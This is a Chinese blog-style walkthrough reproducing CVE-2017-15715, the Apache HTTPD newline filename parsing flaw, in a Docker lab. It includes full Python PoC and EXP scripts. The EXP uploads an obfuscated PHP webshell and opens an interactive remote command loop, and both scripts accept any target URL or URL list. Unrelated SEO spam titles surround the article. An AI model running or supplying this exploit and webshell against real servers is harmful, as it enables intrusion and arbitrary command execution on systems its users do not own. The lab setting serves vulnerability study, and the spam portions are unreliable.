当前位置: 首页 > news >正文

滁州房地产网站建设网站黄山高端网站建设

滁州房地产网站建设网站,黄山高端网站建设,西安百度公司电话,建筑电工证查询网站漏洞介绍 CVE-2017-15715 Apache HTTPD 是一个广泛使用的 HTTP 服务器,可以通过 mod_php 模块来运行 PHP 网页。在其 2.4.0 到 2.4.29 版本中存在一个解析漏洞,当文件名以 1.php\x0A 结尾时,该文件会被按照 PHP 文件进行解析,这…

漏洞介绍

CVE-2017-15715

Apache HTTPD 是一个广泛使用的 HTTP 服务器,可以通过 mod_php 模块来运行 PHP 网页。在其 2.4.0 到 2.4.29 版本中存在一个解析漏洞,当文件名以 1.php\x0A 结尾时,该文件会被按照 PHP 文件进行解析,这使得攻击者可以绕过服务器的一些安全策略。

环境搭建

docker compose build
docker compose up -d

检测web使用的服务器,Apache 2.4.10版本,可能存在Apache HTTPD 解析漏洞

image.png

漏洞复现

上传一个phpinfo的文件

<?php phpinfo();?>

首先,尝试上传一个名为 phpin.php 的文件,可以看到上传被安全检查拦截:

3.jpg

切换到Hex,在1.php后添加0a

但是,如果我们在文件名 1.php 后面添加一个 \x0A(注意:必须是单独的 \x0A,而不是 \x0D\x0A),上传就会成功:

4.jpg

发送数据包,如图所示

5.jpg

在ubuntu上查看信息,科里面可以看到我们上传的11.php文件

#查看镜像CONTAINER ID
docker ps
root@xuan-virtual-machine:/home/xuan/vulhub/httpd/CVE-2017-15715# docker exec -it cve-2017-15715_apache_1  bash
root@2dbf622e717a:/var/www/html# ls
11.php?  index.php

浏览器进行访问[http://192.168.118.135:8080/11.php%0A](http://192.168.118.135:8080/11.php )

当访问上传的文件 /1.php%0a 时,虽然该文件没有正确的 PHP 扩展名,但它会被成功解析为 PHP 文件。这证实了解析漏洞的存在:

6.jpg

POC和EXP脚本

#CVE-2017-15715-POC
__author__ = '纸机'
import requests
import optparse
import osparse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')options,args = parse.parse_args()
#print(options)
#验证参数是否完整
if (not options.URL or not options.PORT) and not options.FILE:print('Usage:python3 CVE-2017-15715-POC.py [-u url] [-p port] [-f FILE]\n')exit('CVE-2017-15715-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')filename = '/2.php%0A'
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0','Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'}
#提交数据
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-streamaaa
-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"2.php-----------------------------153388130435749919031880185481--'''
#验证链接
#url2 = options.URL+':'+options.PORT+filename
def upload(url):try:#上传文件resp = requests.post(url,headers=headers,data=data)return 1except Exception as e:print("[-] {0} 连接失败".format(url))return 0def checking(url):try:#验证文件是否上传成功response = requests.get(url+filename)if response.status_code == 200 and 'aaa' in response.text:print('[+] {0} 存在CVE-2017-15715 Apache HTTPD 换行解析漏洞'.format(url))else:print('[-] {0} 不存在Apache HTTPD 换行解析漏洞'.format(url))except Exception as e:print("[-]{0}连接失败".format(url))if options.FILE and os.path.exists(options.FILE):with open(options.FILE) as f:urls = f.readlines()#print(urls)for url in urls:url = str(url).replace("\n", "")if upload(url) == 1:checking(url)
elif options.FILE and not os.path.exists(options.FILE):print('[-] {0} 文件不存在'.format(options.FILE))
else:#上传链接url = options.URL+':'+options.PORTif upload(url) == 1:checking(url)
python .\CVE-2017-15715-POC.py  -u http://192.168.118.135  -p 8080

7.jpg

EXP

#CVE-2017-15715 EXP
__author__ = 'zhiji'import requests
import optparse
import timeparse = optparse.OptionParser(usage = 'python3 %prog -u url [-p port] version=1.0')
parse.add_option('-u','--url',dest='url',help='web server ip_addr')
parse.add_option('-p','--port',dest='port',help='web server port[default:8080]',default='8080')options,args = parse.parse_args()
#验证参数是否完整
if not options.url or not options.port:print('Usage:python3 CVE-2017-15715-EXP.py -u url -p port\n')exit('CVE-2017-15715-EXP.py:error:missing a mandatory option(-u,-p).\nUse -h for basic and -hh for advanced help')#ip = '192.168.132.142:8080/'
filename = '/hackdoor.php%0a?0='#上传链接
url1 = options.url+':'+options.port
#命令执行
url2 = options.url+':'+options.port+filename#数据包头部
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0','Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'}
#上传数据
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="hackdoor.php"
Content-Type: application/octet-stream<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"hackdoor.php-----------------------------153388130435749919031880185481--'''#上传木马
def upload(url):print('[*]目标地址:'+url1)respond = requests.post(url1,headers=headers,data=data)try:if respond.status_code == 200:print('[+]木马上传成功')else:print('[-]上传失败')except Exception as e:print(e)#命令执行
def attack(url,cmd):respond = requests.get(url+cmd)try:if respond.status_code == 200 and cmd == 'pwd':return respond.textif respond.status_code == 200:print(respond.text)else:print('命令执行错误')except Exception as e:print(e)
upload(url1)
time.sleep(0.5)
print('输入执行命令(quit退出):')
while(1):pwd = attack(url2,'pwd')pwd = '{0}>'.format(str(pwd).replace("\n",""))cmd = input(pwd)if(cmd == 'quit'):breakattack(url2,cmd)
python .\CVE-2017-15715-EXP.py  -u http://192.168.118.135  -p 8080

8.jpg

修复建议

  • 升级到最新版本
  • 对上传文件重命名
  • 禁用上传文件的执行权限
http://www.dtcms.com/a/530941.html

相关文章:

  • 太原网站建设培训广州营销型网站
  • 免费网页制作网站建设网上书店网站建设毕业设计
  • 网站建设空间什么意思网站制作网站建设运营团队
  • 南京seo网站排名优化网站用html做框架asp做主页
  • 辽宁住房和城乡建设厅网站首页非凡网站建设平台网页
  • 国外源码网站网站开发有几种类型
  • 网站后台验证码出不来百度关键词自然排名优化公司
  • 用html做音乐网站深圳响应式网站建设哪家好
  • 做百度移动网站点击一个做外汇的网站叫熊猫什么的
  • wap网站要花多少钱wordpress海报插件
  • 专业的网站建设方案网站建设对企业的帮助
  • 3. 是网站建设的重点自己做的网站主页被人篡改
  • 什么大型网站用python做的线上商城介绍
  • 晋江网站有什么职业做网站发布后打不开
  • 网站建设一百互联贵州网站定制
  • 济南中建设计院 官方网站平台怎么推广
  • 广州市车管所网站建设购物网站的图片轮播怎么做
  • pHP可以做论坛网站吗重庆新闻论坛
  • 营口网站建设wordpress不能登录界面
  • asp与sql做网站别人做的网站不能用
  • php网站开发概念和简介免费行情软件app网站mnu
  • 合肥建网站怀宁做网站
  • 南京做网站公司哪家好煎蛋wordpress
  • 手机营销网站wordpress 命令插件
  • 北京市建设监理协会网站移动应用开发和软件技术的区别
  • 做旅游网站一年能挣多少新品发布会活动方案
  • 网站单页支付宝支付怎么做的网站建设 400电话 广告语
  • 通过输入域名访问自己做的网站怎么样自己建立一个网站
  • 海外网站购物平台有哪些做网站怎么学
  • 惠城网站设计秦皇岛网站群发关键词